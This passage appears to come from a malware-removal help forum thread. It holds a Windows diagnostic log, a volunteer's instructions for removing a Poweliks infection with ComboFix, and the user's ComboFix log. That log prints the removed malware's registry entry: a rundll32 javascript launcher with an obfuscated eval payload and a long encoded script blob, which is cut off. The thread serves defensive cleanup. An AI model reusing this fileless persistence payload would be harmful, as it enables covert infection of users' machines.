
Service:

Problem: : This device is disabled. (Code 22)

Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:

==================

Error: (08/23/2014 04:24:01 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\HISTORY-JOURNAL> in the hash map cannot be updated.

Context: Application, SystemIndex Catalog

Details:

A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:53 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA> in the hash map cannot be updated.

Context: Application, SystemIndex Catalog

Details:

A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA> in the hash map cannot be updated.

Context: Application, SystemIndex Catalog

Details:

A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\MANIFEST-000002> in the hash map cannot be updated.

Context: Application, SystemIndex Catalog

Details:

A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA-JOURNAL> in the hash map cannot be updated.

Context: Application, SystemIndex Catalog

Details:

A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\TOP SITES-JOURNAL> in the hash map cannot be updated.

Context: Application, SystemIndex Catalog

Details:

A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\TOP SITES> in the hash map cannot be updated.

Context: Application, SystemIndex Catalog

Details:

A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\LOCK> in the hash map cannot be updated.

Context: Application, SystemIndex Catalog

Details:

A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\LOG> in the hash map cannot be updated.

Context: Application, SystemIndex Catalog

Details:

A device attached to the system is not functioning. (0x8007001f)

Error: (08/23/2014 04:23:46 PM) (Source: Windows Search Service) (EventID: 3013) (User: )

Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\000002.DBTMP> in the hash map cannot be updated.

Context: Application, SystemIndex Catalog

Details:

A device attached to the system is not functioning. (0x8007001f)

System errors:

=============

Error: (08/23/2014 04:23:55 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (08/23/2014 04:23:32 PM) (Source: WMPNetworkSvc) (EventID: 14325) (User: )

Description: WMPNetworkSvc0x80070424

Error: (08/23/2014 04:23:31 PM) (Source: Service Control Manager) (EventID: 7024) (User: )

Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026)

Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7026) (User: )

Description: AVGIDSDriver

AVGIDSShim

Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )

Description: vToolbarUpdater%%2

Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7001) (User: )

Description: AVGIDSAgentAVGIDSDriver%%31

Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7023) (User: )

Description: Computer Browser%%1060

Error: (08/23/2014 04:13:21 PM) (Source: Service Control Manager) (EventID: 7030) (User: )

Description: PEVSystemStart

Error: (08/23/2014 04:09:54 PM) (Source: Service Control Manager) (EventID: 7030) (User: )

Description: PEVSystemStart

Error: (08/23/2014 04:04:22 PM) (Source: Service Control Manager) (EventID: 7030) (User: )

Description: PEVSystemStart

Microsoft Office Sessions:

=========================

Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time. This session ended with a crash.

Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time. This session ended with a crash.

Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time. This session ended with a crash.

Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )

Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time. This session ended with a crash.

CodeIntegrity Errors:

===================================

Date: 2014-08-23 16:55:09.878

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:09.753

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:09.581

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:09.441

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:09.223

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:09.113

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:08.989

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:55:08.879

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:54:50.034

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-23 16:54:49.909

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz

Percentage of memory in use: 54%

Total physical RAM: 3069.46 MB

Available physical RAM: 1392.41 MB

Total Pagefile: 6375.2 MB

Available Pagefile: 4531.66 MB

Total Virtual: 2047.88 MB

Available Virtual: 1882.66 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:223.01 GB) NTFS ==>[Drive with boot components (obtained from BCD)]

Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS

Drive f: () (Removable) (Total:14.61 GB) (Free:13.1 GB) FAT32

==================== MBR & Partition Table ==================

========================================================

Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)

Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)

Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)

Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)

========================================================

Disk: 1 (Size: 14.6 GB) (Disk ID: C3072E18)

Partition 1: (Active) - (Size=14.6 GB) - (Type=0C)

==================== End Of Log ============================

Naathim · August 24, 2014

Minion%20Welcome.jpg

My name's Naathim and I'm a GeekU Minion! Now that we are mates and will be working together to clean your machine out of any junkware, feel free to call me Naat

Before we start please note the following:

Analysis and research take some time, also sometimes real life gets in the way, please be patient.
Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
Paste the logs in your posts, attachments make my work harder and more complicated.
Stay with me to the end, the absence of symtoms doesn't mean that your machine is fully operational.
Note that we may live in totally different time zones, what may cause some delays between answers.

I can't foresee everything, so if anything unexpected happens, please stop and inform me!

There are no silly questions. Never be afraid to ask if in doubt!

Let's start and enjoy the fight!

Rules and policies

We won't support any piracy.

That being told, if any evidence of illegal OS, software, cracks/keygens or any other will be revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!

The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result with closing your topic and withdrawning any assistance.

You have got Poweliks infection.

Scan with ComboFix

This is a very powerful tool that should be used only if advised by Malware Analyst.

Do not run ComboFix on your own!

Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.

Temporary disable your AntiVirus and AntiSpyware protection - instructions here.

If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

Right-click on icon and select Run as Administrator to start the tool.
Accept the disclaimer and agree if prompted to install Recovery Console.
Do not take any actions while ComboFix goes through your System - it may cause it to stall!
This scan may take some time!
When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).

Include that log in your next reply.

If you'll encounter any issues with internet connection after running ComboFix, please visit this link.

If an error about operation on the key marked for deletion will appear after running the tool, please reboot your machine.

Don't forget to re-enable your previously switched-off protection software!

jjoyner1985 · August 24, 2014

Hello, Naat.

Here's the Combofix log. I see a reference to the Poweliks infection you mentioned.

ComboFix 14-08-21.01 - savas.kyriakidis 08/24/2014 15:26:27.3.2 - x86

Running from: F:\ComboFix.exe

.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))

.

CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.

You should verify if current CLSID data is correct:

.

HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}

<NO NAME> REG_SZ Thumbnail Cache Class Factory for Out of Proc Server

AppID REG_SZ {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}

.

HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32

<NO NAME> REG_EXPAND_SZ %SYSTEMROOT%\system32\thumbcache.dll

ThreadingModel REG_SZ Apartment

.

HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32

<NO NAME> REG_SZ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))

a REG_SZ #@~^WX4AAA==n{F+2im'xh,)mDk-+or8%mYvEUmDb2ORUtVsJbIStrVc+e'*+* Y.zPhxlc3XwC NAx\bDKU:xO?DDrUT/`rYhbxNb.YJ*ia'A_Ew'/z/Dn:2 wwSkx[GS/2WSnM/4V^--7FcT-'wGhDd4VVcn6Ji6xU+SPzmOk-nor8L^YvJj^MkwOr o sbs?zkY:r(L^Yr#I0!x^ObWx,^N `#PO.XPDY;DU~mR]+T]+mNcE_|S\w'/G0DAmDn'-skmMWkG0D-wxY~WMl:AWM3PknOEa-'x[www7 !cX!F {w'/wEbp8^lD^4`n* M+Y!D ~!p8N0!x^ObWx,[`!# XxU+SPzmOk-nor8L^YvJ\dX:V+ U+.\.oHJ_K:nR+RZE#p6 Wa+UcrM2:E~!~0msd+*iXRd+U[v#IE6U'mR3aalx[3 \rDKUs+UD?DDk okcJuYn:a]wwr#_! /!4/D.rxT`!RsldO&x[+X60vJ&E*_FbI!0UY{;6xQrRD:wri!WY{0 ZM+COK+XOsbV+v;WxD~DD;+SR8#Ik6cE6Yb`!0Y MkO+vacDnkwKx/AK[X*i;0DR/sK/+vbi!0'6 /DlD+P+aOwks+v;0 ~O.!+#I;6Yx0c!YobV`E6xDbi!0d'!0O }w+ )/:+6DjODls`bi;WkR]+m[`y#I;6R.rD+cE6dcInmNvE0DRUryO+#*i;WkRZ^G/`#p;WR;VK/n`bI6R9+^nYsrs`EWUD#Ilc]!xcr-rJ_!0 QJ'J~z$ErnDPz GD/Ym.OJB!BFbiW G+s+DnsbVnc!0xbI)8Atbs`Z6RwkV2Xr/D/cw*#`r6`m9U`*''Zb`NvJr#I8[crtOYalzJNGA VWC[c:rmMGkWWDR1W:JNKAx^WCNJb&{J*zz{*~Z!8{Rv2ZAO*G9 %obWRbwAX/yFA)/lc&bU9WAkvc!OnAO%O&TOX% s/Erbi)`lc3U\bDKxh+UOvJKDK^+k/Eb*`JCE*'Eka,`,:+XYRAx1GNbxLT=))j;qqc!+D?YMrUov$;WU\n.DTl)w.WsACdvcjOMkUovv9CBl+y}F(:gTlq,;qVNVn8At1hsDqZ48iMwXIqV[!jXFs~-myVTCq,EKPz/Pw;\MoZ429*h?"im .s|j!L 8I*1!.((.ZLBs~t1:oYtp"V^xtd8A4^ssYtp"V^k4}(&HaNVV\(LZa|j!L8IX^V.N&/IU}("q^:lj($VK#D8 ^V(U3{BwI*^!jZ[^d\M#HnjYA1C~34yF4lq*[6Nwf9p9H}lT]MOYIsEJV"Vt:^;}`IX8ssYC gA^&gs(Bk+UoW::jfS`,rls.%[;AKp1Z}Z;i:j:(M#L[!^\8kl$m21s8q9/nilt8`G&VB^}s6VI&"s}AIs4V.UeoIV&r3aSsDPn(g!\TEihj:8Mj%NVV-8b*s8 ^!J3w"1 #D5s6*5xj24VIsm0s%ey.y1q!+rVxq8k0E"M#:C lV]C^;5qF2eZF\tuj/t?TrUXg}qF\1x^H4yIq4VjrJ;I:I 6.}?0;]Mj:mXV#u^ht?TrN;qd(01/epgyJs~qI:aa5H6K\wd}qpdpq*"C`1/Ip1.S2wq[MOf(Moy^z&/ FgXm2Is8U*1[ X!Cg41&]A}q6V\ wT}j!2rHIinoAV5U.a4M"s^kl2\tw8hjf8 l"N_9qe2I\^rTkiV"P1M#Nlqs/::wO}U6(lqIs} VKm mkjCjr8M^L&ka4if^y[MjOS^9sts6Vef"w8 W;5 ok4VVE\!g-4 }s4 I28y*yoPW+j&"48:"t1:}/Bo~t^:wO}oIs^ HwJsgV[2^O1Ma^4q.E9MwTlq,;Is64t2HW&s984x"28`/:oEe 9VtZ&2rHIinoAV}Ujw8M"s1kXA}q}w(:jH}oIG4ypG(0VE9h,M}?&d(V~FI:awezXqC"sp VPCqm/Phj&i X-9Zaqlo9!9wdqbhVjs.T[o9EjuVS}?SViMwXIqV[!jX^X0;jy.TjqFh8!jYtlTI(]a4y*M(MwUmHorj .;[VVY\j6g5l4t j3&kVG^hj![(x;q;IinoAV}Ujw8M"s1kXGms.t9Mji+oAs|;3{Wq}F(h1ZlO;(M9tF$t^hwY(Z48jVszeqFV[!jXFs~-1 sZlq,EhKzdKqs;}VsT829*hjI`mxjsF.ZoqFH!^h^EtFZL9AF-t_./tjX4iMwzIq^NV.Xns~-myVTlq,;K:2/: s!}MwT8&x*h?]j^UjVF.ZL81T^sVEtqZoBs~z( H^}_.X\?0{9w1Xm2Is8`sy1+.D5:XXK.DA1C$28+8tCl[rNw9[o9Xt l!]MOOIs!S0NV92w"my.O5s62toHWnp6olMjzt?8nI:2Vef"GBsR;Iy6-ess/}pgyt8r(CsG5q1W\?zOpq*Vq;IWJ06\I+sZlO;JVgh(Ms!F/xmpZ&2H!apU*s^pjt8CtG&VHlm2IV(?lV4Vhr|o!{Bw.E1+ss}jl4[M^ \jqV[!4\tCt19w1X^2IV8iwy^ jOI:alS0NV9s"XmVjGq0F2e29\1+,sNZlpCWytkX.8Ugtt:j65oI2[s.1tp"W8 ""&kVFms.!9(x;q;I#4 14ts.rIpIaN:jHt("W( ]yJV9V[28sNVt-t;ok]+j!iCx-I!o0}_9V1&tr|U*B4 }-CyjWx!*84MSd}Z44`&sy[!jYJVxq4 I28qjEj l!t(x-1sH^m }wI j"S0t44sIdtj9V\s!KK:jfJjOkm:#L[/~Kn(gT}q!;i .E[!^Yt?lB(x]^ms,h` jzNsV%}oH;jVsE\!6^j:jhFZ4r\(^YP+x;tgTqAV;[wA!^r0/Bsj;1 os}`*t9M^+}`FsNVt-t_HE"+.ZKjTCMO3nZBCtp"18 "q4V.(eq*38!`kF?lB(xt7lyjWxMlq4Vhdp;oVPq,39 6^|?02F?S3`CB\e+j3[(xs|U3{WjYZnp"V F8[&Z]SnjYf( l+}o9T(:W] 9\(i94m `+Hsg!1:sEtzTk#V^+mym.nV,t8p"}e8 (sj.8V("&~Xs,dIsFdC_sk( snjVa* wYj:qw##9V#!9Am8w-8A}\]h46PKx4UVB4?^Vtm3aOlj.pl8Nu82.l(+6VmMXG^.aCIj2?e 4}e8*4qV##2s(]+w|i:w*(sj.2.lU!jfp`s$pooA As( 6l}28V]x4qj:4k]i4qi:gGmy9u6qwcCq41}j^T5j]VKZI&5(4p+GAejjIu6qtl: IVHjj*^s^E:24?t!4We ldp t. V1AP "M^!jV(M]VIAt?IVxX5N96p oA#.Il"q9lV9rjsxkC2L6oaM[:99K_V!t`6f#+w2t.gfq]:.Z6Lj2g6.^wU+b,X[ V;`sqMlX]#:82UV#: hKX[ D!H`9.t`p\[f4*H:O}d!]&j:.n}MTa+s,T.01B[A1pUpIwIj42]sa:\!oa63dhtjg9kv1/n`6(}qghijxu"f4 jvsad&wf}v.2?^tsn`w?\#1VN!A.]9x5joAPfgHCKwo:5*8`65tp^HtMj2:sBsl`62Ug}N_NjIVViZNxtsoWpjw}j ^.ty$;##4I}?OBmw9hiZ6?tU^H M\]"fBxmA.Z\2A+j0q"jqI]8b,?\UVA}:\fp:gfj!]:tu9rtswk?sis}zwjtsgr#mx$x[g4ac*u("6r`va5z9r}`i*"uanimx/\jxD5!}D}P^*HL"}1Ap"#`Iw o4&Jy~egMVSGInts4.5y,pK^9%}^s.9%Vqr2^T\jg99#I}VjA}j^(IZ9/]`sA]f~Aejw$9!o~p`py9L^.`N-pU%X}Zw?\hVVN!A.]j\x"joAjp"H#3^64GV$}ZhDi3OD]f9V:2txHj.C`!w+jNt181f w1guIdp!^"njRcgKBA8f\nCMgdHA}t[GVfjp"*]2^(U2B;I`sA5.z"l:1-I`2-C wh5j/.j&9rJFx:`!]&C 1F#M\j+owt[_Np}#~&CK5+5jo~p`sxt&9/IAs/Hw1t\:tA`pVtIC9}j.j:}.e!j XMHj^epqI9[`65[qw2 M\51347mZIWI!&qp^2.H2NK^Ztwt9HZlVj]jjw/"Z13t#5\#:\9?02tiaizjiz&}j4e\MVSGIx}Mg#}2W*pqIr[`6;1#s~pjw9jV"V5!a;^iwA}jw9KG99[V.r}#~9tyxet2ohm.9wt.4UK8}eHV1#Z*9hwU1:l]Ca5m!sw#s4&]f9%ww- w13}p^ZHCI*`2o~p`ph5j8jpj9aI_tfP;,j\VqX1jw!\K^A`21w\TjsCM\CHomT[AVpjp"1}!gG1jo_4Zq\tFjBp:t5S.As^Z11}39sMX+jx9W5joxtp99}.w$pj} sZ]+9APjw$5(t pjsA5jxp5qN3SZ}4no9f`TNt13^e[25!j2XAiiwA#Kw%+NqaPs%\["4A}j\ed&]Gjq,A`jw$Ko19K;,t[0%cgUq7IVgX^!gK"!t&}jDnC:9op`sB^.3\jfg|j.9G1&B lyt\kOer:VG4yNJHAw9`U}b.:\hex4d`oq}i5\\K"epqI3\`stj!^F}Fg!`sjjqYC`ZOelV1/HA6B[^sSt#sMIjX.]2wI5jon6iIX}O+js3"iqYsjPAcj3xP:CsyKyYcmFw#I0s9I_N$#HYA5Vs~pjO"}!Zc5!t&}jDsj9op`su8Zttj#gF}Fg!jk1W.sYX5DGloWAN29$Cytx}osglMg/\jj5xoK#+^1^:9.l;%fiqYS}ijA}.z-qMo;j`Yfmj96j01]j.}6w5\Uf1n?.^e}j5!jM#A}iwAPK4/pqN\`F1ipgW]f\6jjq"mytL\F95.ZIoKAVp8ZVt:hV8pFg!#kOcj:OX} DWty4]Kqt%}Ns?H+D.} 9-mMVWIZ*.5j9F.01]jqVG}0sW:VWX|FgT]jaZ5:0Fj""|j.\!48IJ6Aw9i#9X}jw$5.#_ljVX9 DG.s6eSZ}e}21f`TNA+2x*^jwM5Ve\HqwDj!wop`s}J8tttTl\\2k*U3sq;,MjFg"p81uI_t$n`}&Uo}I}&KaPj8I1 42\T^SnC9 5ZF]^ytAiiwA}jDoqjH24yo\g!w$I`s$pqs6i2}f`T}o.:I*#:gS9!29 #~s]j"}5^ja}^5\HqwDj!wo5jo5S8t\`:9\pyV!.;%f}`ss5is~pVw]i3wA5V3\HqwDj!wop`s}J8tWtugpCsjinX07rq,AUjw$p`}6.b,*#y,69+YKfw+J&"f`.#AiiwAJ&4#529$Cyt5Cs~A s^("jH~I`sA:j^op`}pKGNBiV/DUit.mjwo}jwMqV4;##wDjj\/4ZsUj`sAi94j3DfU3so4ZNt\!\apo5*.0,J[Zw9qp}2}XRfJ!5!`!HA}iwAPK49Ks}9ijs6HUjX^Kx-5F[_48sl( Xo?09]+ N!6qFwj#sMIXsPVxf`.#.]hxqi3g]}y}f}`sAt%4]!DfU3s\As3j.a-SH%-Sy5aeb,M`T1.pFgu]x9qjKB;##wD]2\9K^99ij..]hw|t3g]q?1W.q,X5DGlV1/H`tt[A.|5VYt+j8(^2gAnyB*eT4x}!9tI_Vue`w2i 9|} ^u:C48mZY9L4 ?AYf?0VtiA3\tPV^l?D tC1X(!ottT5\t2g]KU,*#:AX} DWtXO5d ]hHjst:w(p81(4Z9+eb%\tip7I:w9^3gKUC(X#s9re3gPKqNsn NA}iwA#KwCqMoDNwVt(.\Olj.pKjNu^_Vl(+6Vl:XG^xYIj2? Vx}e8 4qV##81(]f~y :Od":aVl_s1t:wFj^wCqs5jsFwj#N\.!9-[.a\(2tY8!46 394?^9CnwV16p"YC.jp\oD+wVl( X!4ZN4?^94jsFwj#}NNj5.\3wA"24?##x1eLx!l2oA#0Vj]+Xwe&gV"V]_I VVj.\O+GA jq.o]ZV5jV6&jV"jjsa5`Voc\o`!e ZXl^s%tA}p]qxDe 8 ((LS.0sLt!OBw.\?w9jCAIkt!68+f~#e w5`x$}e+"Mjj9*mV.O#ZV5iq"qi:"j"M(SK Vcts4t^N!Hww%tA5y" 685ygijsxV5:4k8il/CjI"l2oA#q,? !4ht28V"3aVjs,L(.\O+GA#N8VpiZV5j36&j:jG#Mj5:3Bc\o4ye39*N^3*tA5c]VWhe 8d((LSGAk(jBV}r?w9 i }k"q.++f~ j8wgOkP "MF!1Xm8wpjAt?tUT6t2"H(LS.`sH(.x"50VG}A9HtA}f"".k}243jsxICH3\hS nf~#j`6Oi 1kj 43]38V"xo;1AFn1VxOlj.pm2oA#2.Dj 2HlL92jf9&5jol8+XM[39PlAF$}`sAP "M^&tz5#M.sFcts1zHsN(?w9rCV*v\Uw++f~pF!\s(j]yP "M[&".?.V6\qFc\o4C}3Xq:so~+`I&5(^\rAV"H^w-PbYH5hoXKf"TF!89tjX;j X3e!g+1q3A\oNA6!8r]3"OUFt;.ZF1(sw6l^Arp8se#`W\to}2}yta[!"q:Msx\"w&]24]r`%-}Nscjp56^2^T"F$xNA.1UM93+V,T1AwB[AV9UpI"?2^T}j9A`ZOA69"2\Odrow3i;,w#Px9C.\p"sIHq,wj.\UK.tHjVt-#`sA5iIHIMOT\399(fohPf\fCKwpIq3A\0Vw\o41]f9%"#xmZFFq(t*}yN}KyV#\o1;j#}wp?RT^sx(j25 3gHiV49Kw}p[Zphjp~s}Vj]gVB;.0.3`W-j^t9IV}e}jAL9#NA}V4$iM"I:!2:#qg|#s9XK^Iiiow&}+Xre3^T::Bxmw.Zjsw3+`IA.`IiiNsZmT1A|!AXnKI!`f]2\qj2C.T"jq3"\q,?H!S*ej"T}.s&?Z}.tjO6j^sGjU%a#sYw}i1tjaXPMaZ5!oA}iwACK"]jqt$}`sA}#~SC.\ (!Tl? sM"kR"row}H^1B8A}}"u}AIf"4jjwA5jo;#ij1C.j my3A# 1w[TwvJ&96":oxmw.pjVA+I0IGH`9.t`p\9fAlrs^}J!gE`jqx\o\y]3jt1yIp} 3XPf"}e?OtjVXjotsU(goKjs6.ss$P0}tU 6053^"jK\vU!a3#+^| s49K^I3]`1w\q\&]f1qt2X0jjA!m:kfr:1#?H%A# NIqicl5!x!nK`!:LsL}VIh]ZRXIs9B[A*kjpg1Cj"+:M]Nm 9fq("!50V"IqN-8A}}UPsVI!\/#s`!tjt]V5\#V9jjU%a wswJTgri:jG`.iXKZ*?\:4]S.s l8.}6j5hU 6V30a]3DM"Z13e#5\#:"/.VV# A!\6 wri:gG`2j..I." Oo.:paI s!];,jT22Nygf^:0hq2swnVgHtV4XKstf}oNA}ixIJyw mF#x?AtA53w$p`}hS8}pi^2\tqtxSywt62Rc:L4A\hO6#!\3S8}%nV}5Cs~A#y"}":]g401Z5jx lUY*j^. P^NtUA~5jw$[!wA5XOA]VwA}j\t+b%atb,3i aq}Vjf2HlI`*A5jw$S2tp?osfCytw} m2H&1.]^I5joAjPwMF!\/.ys/n_9fCi\jJyg#UsIH.tc9F\HKjs"lAIU}`sA`9tql2D"j3^}q2o3]qx5#Lw6.w5atb,3i aq}Vjf2HlIjAA5jw$S2tpposfCytwdT22rKgj]:w }.[c[q\1P.w"lA.$}`sAi94 jD"U3s\H`5\"3xpS2t#r_sfCytWIT1tj:\*\2j\`f]S8sjrnC9 K`F]^ytsiiwA}jjh13B4K^s1`(gG. 5*.s,J^Zw9\p1tS&4p#(w&m 4\\iwc}&^uK_oa6q.(6!lf}3w/j:VM+`p&"sxi.s,TH`1!t_sC"UIXI O+]sa\(2e&]h4YC.jeNqsU]Z*?tp4ICVjtg2T7rjswqftA+GAeNH,J6Aw9\%tq}!Dfj3^}j2o2Hox*}.w$pq3A 0.w##4DCVjemF#xH`}v"3x-?yN]p`sB\`5D"VI&pVjfn2g*"jtA}iwAC.I"KqVe\8sw 9g}C.T"jsIHy1wqfgUljo"4H,*#NtX5 YKKy4%iMafm!BA}igri:\*jjj-6:2dp gm#2"o:2s"`sa5j5-i^ipm01p]z}&5jywrc9$}jw91 ]1jfg|j.0ai01!}^t\hOlJyge}C42.0F1`(gGp N$p`s}J8IWITs5lMxU}jwA5!ar sgX}Fg(?A9#[2tfnij9}jw$5?0l5`pDUMO}lww.p`s$} sZ"+N~Kjw$}?Ryjjsc[q\1P.w"lA1]}`sA]hI\]:wX13H:IZhc"CI"}AtXK^9]Cw2\tq.x+C9 Pj8I1 4ftTwA}j\Cm`Nh6:2\i/OjCMg/tsosrG9c9F\HKjs"lA1f}`sA`9tqI2D"j3^}(!3\^+9p[Cg/jU,eb,Mi ^X}Fgu531~pqNA5jxIb%XHUYHeZ}j"3.t?.wf}jwA"M0hi9t\Jy"dINVK^Zh\no9.^(9.mM0Xpotfj\-p`V$p`s!twm\oN7m(9.Cf\&dX06[pgCJ&4p.osfCyt\\iwc}&^(d ]s+b,MIjgzp81(m0H-6w}/Uf1n?w6ij8I1 L\\qT!J&4p}2sfCyo [q9;#j"o:2s\NA5*"L^s..t;pZI$}^I( 